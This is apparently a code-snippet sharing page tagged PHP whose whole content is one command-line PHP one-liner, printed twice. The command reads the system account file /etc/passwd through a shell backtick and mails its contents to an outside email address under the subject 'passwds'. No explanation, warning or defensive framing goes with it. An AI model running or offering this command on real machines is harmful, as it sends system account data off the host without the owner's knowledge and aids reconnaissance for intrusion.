/ Published in: PHP
Expand |
Embed | Plain Text
php -r '$p=`cat /etc/passwd`; mail( "[email protected]", "passwds", "$p", "From: me " );'
You need to login to post a comment.
php -r '$p=`cat /etc/passwd`; mail( "[email protected]", "passwds", "$p", "From: me " );'
You need to login to post a comment.